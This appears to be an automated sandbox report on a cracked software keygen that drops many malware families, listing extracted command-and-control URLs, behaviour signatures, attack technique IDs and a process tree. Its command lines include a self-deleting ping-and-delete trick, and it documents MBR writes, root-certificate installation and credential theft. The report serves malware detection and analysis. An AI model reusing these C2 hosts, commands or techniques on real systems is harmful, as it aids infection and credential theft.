azorult | f95d12a0dbd8199d16f48d8e4cbe69a8d4ec16c534efb36e52a662664e1c1783

Target

[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
Size

9.2MB
MD5

b806267b5f3b7760df56396b1cf05e6d
SHA1

5166d4c1d3e476281d9e991eababc3e4aa9ec5ad
SHA256

f95d12a0dbd8199d16f48d8e4cbe69a8d4ec16c534efb36e52a662664e1c1783
SHA512

30e393bb3898edc8ab5fb04e62ce421ddf3903075f59e3880408b300f46bb74a85088336d6e1203b2101152cebeef4c1730290b41ca77604ecb722c8f627328b

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

smokeloader

Version

2020

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

http://4zavr.com/upload/

http://zynds.com/upload/

http://atvua.com/upload/

http://detse.net/upload/

http://dsdett.com/upload/

http://dtabasee.com/upload/

http://yeronogles.monster/upload/

rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2019

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/

rc4.i32

Extracted

Family

raccoon

Botnet

9ba64f4b6fe448911470a88f09d6e7d5b92ff0ab

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 6 IoCs

resource	yara_rule
behavioral3/memory/2640-378-0x0000000003760000-0x0000000003FBD000-memory.dmp	family_glupteba
behavioral3/memory/2640-379-0x0000000000400000-0x0000000000C77000-memory.dmp	family_glupteba
behavioral3/memory/2640-381-0x0000000000400000-0x0000000000C77000-memory.dmp	family_glupteba
behavioral3/memory/2112-840-0x0000000000400000-0x0000000000C1B000-memory.dmp	family_glupteba
behavioral3/memory/2112-842-0x0000000003700000-0x0000000003F02000-memory.dmp	family_glupteba
behavioral3/memory/2112-843-0x0000000000400000-0x0000000000C1B000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
rat spyware stealer pony
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

resource	yara_rule
behavioral3/memory/7012-409-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline
behavioral3/memory/7020-418-0x0000000000980000-0x00000000009A6000-memory.dmp	family_redline
behavioral3/memory/5500-743-0x00000000049F0000-0x0000000004A1E000-memory.dmp	family_redline
behavioral3/memory/5500-747-0x0000000007140000-0x000000000716C000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Modifies boot configuration data using bcdedit 13 IoCs

pid	Process
6472	bcdedit.exe
7172	bcdedit.exe
3280	bcdedit.exe
7632	bcdedit.exe
7832	bcdedit.exe
5884	bcdedit.exe
784	bcdedit.exe
6576	bcdedit.exe
4388	bcdedit.exe
6256	bcdedit.exe
7184	bcdedit.exe
3672	bcdedit.exe
2912	bcdedit.exe

Nirsoft 6 IoCs

resource	yara_rule
behavioral3/files/0x000100000001ab8a-86.dat	Nirsoft
behavioral3/files/0x000100000001ab8a-85.dat	Nirsoft
behavioral3/files/0x000100000001abbe-118.dat	Nirsoft
behavioral3/files/0x000100000001abbe-117.dat	Nirsoft
behavioral3/files/0x000100000001abc4-139.dat	Nirsoft
behavioral3/files/0x000100000001abc4-140.dat	Nirsoft

XMRig Miner Payload 3 IoCs

miner

resource	yara_rule
behavioral3/memory/3668-768-0x0000000140000000-0x000000014072E000-memory.dmp	xmrig
behavioral3/memory/3668-773-0x0000000140000000-0x000000014072E000-memory.dmp	xmrig
behavioral3/memory/3668-774-0x0000000140000000-0x000000014072E000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

New Service
T1050

Executes dropped EXE 10 IoCs

pid	Process
3556	keygen-pr.exe
3420	keygen-step-1.exe
1120	keygen-step-3.exe
1288	keygen-step-4.exe
1516	key.exe
2688	Setup.exe
3940	key.exe
3776	26FF190E7AE0F7C7.exe
3228	26FF190E7AE0F7C7.exe
3968	firefox.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

Suspicious Office macro 1 IoCs

Office document equipped with 4.0 macros.

macro xlm

resource	yara_rule
behavioral3/files/0x000100000001ab82-33.dat	office_xlm_macros

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/0x0002000000015660-125.dat	upx
behavioral3/files/0x0002000000015660-127.dat	upx

Loads dropped DLL 1 IoCs

pid	Process
804	MsiExec.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5296	icacls.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral3/memory/5224-325-0x0000000006540000-0x0000000006561000-memory.dmp	agile_net

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	26FF190E7AE0F7C7.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 12 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
50	api.ipify.org
152	ip-api.com
349	api.2ip.ua
546	ip-api.com
340	ipinfo.io
348	api.2ip.ua
351	ipinfo.io
395	api.2ip.ua
91	ipinfo.io
93	ipinfo.io
180	api.ipify.org
181	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	26FF190E7AE0F7C7.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2688	Setup.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1516 set thread context of 3940	1516	key.exe	88

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 17 IoCs

pid	pid_target	Process	procid_target
4380	4396	WerFault.exe	137
3912	4396	WerFault.exe	137
4988	4396	WerFault.exe	137
6328	4396	WerFault.exe	137
6740	4396	WerFault.exe	137
6408	4396	WerFault.exe	137
5584	4396	WerFault.exe	137
6760	4396	WerFault.exe	137
7080	4396	WerFault.exe	137
5944	6124	WerFault.exe	400
4448	6124	WerFault.exe	400
5792	6124	WerFault.exe	400
6020	6124	WerFault.exe	400
7644	6124	WerFault.exe	400
6768	6124	WerFault.exe	400
4504	6124	WerFault.exe	400
5172	6124	WerFault.exe	400

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	26FF190E7AE0F7C7.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	26FF190E7AE0F7C7.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	26FF190E7AE0F7C7.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	26FF190E7AE0F7C7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	26FF190E7AE0F7C7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	26FF190E7AE0F7C7.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	26FF190E7AE0F7C7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	26FF190E7AE0F7C7.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	26FF190E7AE0F7C7.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1712	schtasks.exe
64	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
8032	timeout.exe
6460	timeout.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
6024	TASKKILL.exe
7336	taskkill.exe
4100	taskkill.exe
6400	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe

Runs .reg file with regedit 2 IoCs

pid	Process
4224	regedit.exe
4820	regedit.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
5424	PING.EXE
2780	PING.EXE
3284	PING.EXE
4672	PING.EXE
4872	PING.EXE

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	92	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	99	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	179	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	339	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	350	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1516	key.exe
1516	key.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1332	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1332	msiexec.exe
Token: SeSecurityPrivilege	2308	msiexec.exe
Token: SeCreateTokenPrivilege	1332	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1332	msiexec.exe
Token: SeLockMemoryPrivilege	1332	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1332	msiexec.exe
Token: SeMachineAccountPrivilege	1332	msiexec.exe
Token: SeTcbPrivilege	1332	msiexec.exe
Token: SeSecurityPrivilege	1332	msiexec.exe
Token: SeTakeOwnershipPrivilege	1332	msiexec.exe
Token: SeLoadDriverPrivilege	1332	msiexec.exe
Token: SeSystemProfilePrivilege	1332	msiexec.exe
Token: SeSystemtimePrivilege	1332	msiexec.exe
Token: SeProfSingleProcessPrivilege	1332	msiexec.exe
Token: SeIncBasePriorityPrivilege	1332	msiexec.exe
Token: SeCreatePagefilePrivilege	1332	msiexec.exe
Token: SeCreatePermanentPrivilege	1332	msiexec.exe
Token: SeBackupPrivilege	1332	msiexec.exe
Token: SeRestorePrivilege	1332	msiexec.exe
Token: SeShutdownPrivilege	1332	msiexec.exe
Token: SeDebugPrivilege	1332	msiexec.exe
Token: SeAuditPrivilege	1332	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1332	msiexec.exe
Token: SeChangeNotifyPrivilege	1332	msiexec.exe
Token: SeRemoteShutdownPrivilege	1332	msiexec.exe
Token: SeUndockPrivilege	1332	msiexec.exe
Token: SeSyncAgentPrivilege	1332	msiexec.exe
Token: SeEnableDelegationPrivilege	1332	msiexec.exe
Token: SeManageVolumePrivilege	1332	msiexec.exe
Token: SeImpersonatePrivilege	1332	msiexec.exe
Token: SeCreateGlobalPrivilege	1332	msiexec.exe
Token: SeCreateTokenPrivilege	1332	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1332	msiexec.exe
Token: SeLockMemoryPrivilege	1332	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1332	msiexec.exe
Token: SeMachineAccountPrivilege	1332	msiexec.exe
Token: SeTcbPrivilege	1332	msiexec.exe
Token: SeSecurityPrivilege	1332	msiexec.exe
Token: SeTakeOwnershipPrivilege	1332	msiexec.exe
Token: SeLoadDriverPrivilege	1332	msiexec.exe
Token: SeSystemProfilePrivilege	1332	msiexec.exe
Token: SeSystemtimePrivilege	1332	msiexec.exe
Token: SeProfSingleProcessPrivilege	1332	msiexec.exe
Token: SeIncBasePriorityPrivilege	1332	msiexec.exe
Token: SeCreatePagefilePrivilege	1332	msiexec.exe
Token: SeCreatePermanentPrivilege	1332	msiexec.exe
Token: SeBackupPrivilege	1332	msiexec.exe
Token: SeRestorePrivilege	1332	msiexec.exe
Token: SeShutdownPrivilege	1332	msiexec.exe
Token: SeDebugPrivilege	1332	msiexec.exe
Token: SeAuditPrivilege	1332	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1332	msiexec.exe
Token: SeChangeNotifyPrivilege	1332	msiexec.exe
Token: SeRemoteShutdownPrivilege	1332	msiexec.exe
Token: SeUndockPrivilege	1332	msiexec.exe
Token: SeSyncAgentPrivilege	1332	msiexec.exe
Token: SeEnableDelegationPrivilege	1332	msiexec.exe
Token: SeManageVolumePrivilege	1332	msiexec.exe
Token: SeImpersonatePrivilege	1332	msiexec.exe
Token: SeCreateGlobalPrivilege	1332	msiexec.exe
Token: SeCreateTokenPrivilege	1332	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1332	msiexec.exe
Token: SeLockMemoryPrivilege	1332	msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1332	msiexec.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2688	Setup.exe
3776	26FF190E7AE0F7C7.exe
3228	26FF190E7AE0F7C7.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1200 wrote to memory of 1984	1200	[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe	79
PID 1200 wrote to memory of 1984	1200	[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe	79
PID 1200 wrote to memory of 1984	1200	[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe	79
PID 1984 wrote to memory of 3556	1984	cmd.exe	82
PID 1984 wrote to memory of 3556	1984	cmd.exe	82
PID 1984 wrote to memory of 3556	1984	cmd.exe	82
PID 1984 wrote to memory of 3420	1984	cmd.exe	83
PID 1984 wrote to memory of 3420	1984	cmd.exe	83
PID 1984 wrote to memory of 3420	1984	cmd.exe	83
PID 1984 wrote to memory of 1120	1984	cmd.exe	84
PID 1984 wrote to memory of 1120	1984	cmd.exe	84
PID 1984 wrote to memory of 1120	1984	cmd.exe	84
PID 1984 wrote to memory of 1288	1984	cmd.exe	85
PID 1984 wrote to memory of 1288	1984	cmd.exe	85
PID 1984 wrote to memory of 1288	1984	cmd.exe	85
PID 3556 wrote to memory of 1516	3556	keygen-pr.exe	86
PID 3556 wrote to memory of 1516	3556	keygen-pr.exe	86
PID 3556 wrote to memory of 1516	3556	keygen-pr.exe	86
PID 1288 wrote to memory of 2688	1288	keygen-step-4.exe	87
PID 1288 wrote to memory of 2688	1288	keygen-step-4.exe	87
PID 1288 wrote to memory of 2688	1288	keygen-step-4.exe	87
PID 1516 wrote to memory of 3940	1516	key.exe	88
PID 1516 wrote to memory of 3940	1516	key.exe	88
PID 1516 wrote to memory of 3940	1516	key.exe	88
PID 1516 wrote to memory of 3940	1516	key.exe	88
PID 1516 wrote to memory of 3940	1516	key.exe	88
PID 1516 wrote to memory of 3940	1516	key.exe	88
PID 1516 wrote to memory of 3940	1516	key.exe	88
PID 1516 wrote to memory of 3940	1516	key.exe	88
PID 1516 wrote to memory of 3940	1516	key.exe	88
PID 1516 wrote to memory of 3940	1516	key.exe	88
PID 1516 wrote to memory of 3940	1516	key.exe	88
PID 1516 wrote to memory of 3940	1516	key.exe	88
PID 1516 wrote to memory of 3940	1516	key.exe	88
PID 1516 wrote to memory of 3940	1516	key.exe	88
PID 1516 wrote to memory of 3940	1516	key.exe	88
PID 1120 wrote to memory of 3948	1120	keygen-step-3.exe	89
PID 1120 wrote to memory of 3948	1120	keygen-step-3.exe	89
PID 1120 wrote to memory of 3948	1120	keygen-step-3.exe	89
PID 3948 wrote to memory of 2780	3948	cmd.exe	92
PID 3948 wrote to memory of 2780	3948	cmd.exe	92
PID 3948 wrote to memory of 2780	3948	cmd.exe	92
PID 2688 wrote to memory of 1332	2688	Setup.exe	95
PID 2688 wrote to memory of 1332	2688	Setup.exe	95
PID 2688 wrote to memory of 1332	2688	Setup.exe	95
PID 2308 wrote to memory of 804	2308	msiexec.exe	97
PID 2308 wrote to memory of 804	2308	msiexec.exe	97
PID 2308 wrote to memory of 804	2308	msiexec.exe	97
PID 2688 wrote to memory of 3776	2688	Setup.exe	98
PID 2688 wrote to memory of 3776	2688	Setup.exe	98
PID 2688 wrote to memory of 3776	2688	Setup.exe	98
PID 2688 wrote to memory of 3228	2688	Setup.exe	99
PID 2688 wrote to memory of 3228	2688	Setup.exe	99
PID 2688 wrote to memory of 3228	2688	Setup.exe	99
PID 2688 wrote to memory of 2968	2688	Setup.exe	100
PID 2688 wrote to memory of 2968	2688	Setup.exe	100
PID 2688 wrote to memory of 2968	2688	Setup.exe	100
PID 1288 wrote to memory of 3968	1288	keygen-step-4.exe	106
PID 1288 wrote to memory of 3968	1288	keygen-step-4.exe	106
PID 2968 wrote to memory of 3284	2968	cmd.exe	103
PID 2968 wrote to memory of 3284	2968	cmd.exe	103
PID 2968 wrote to memory of 3284	2968	cmd.exe	103
PID 3968 wrote to memory of 2052	3968	firefox.exe	297
PID 3968 wrote to memory of 2052	3968	firefox.exe	297

C:\Users\Admin\AppData\Local\Temp\[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe
"C:\Users\Admin\AppData\Local\Temp\[CRACKHEAP.NET]PW12345Easeus_Data_Recovery_Wizard_8_keygen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1200
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1984
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3556
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1516
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        Executes dropped EXE
        
        PID:3940
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:3420
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1120
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3948
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:2780
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1288
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      Writes to the Master Boot Record (MBR)
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Modifies system certificate store
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2688
    - - C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
        5⤵
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:1332
    - - C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe
        
        C:\Users\Admin\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp1
        5⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Writes to the Master Boot Record (MBR)
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:3776
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3968
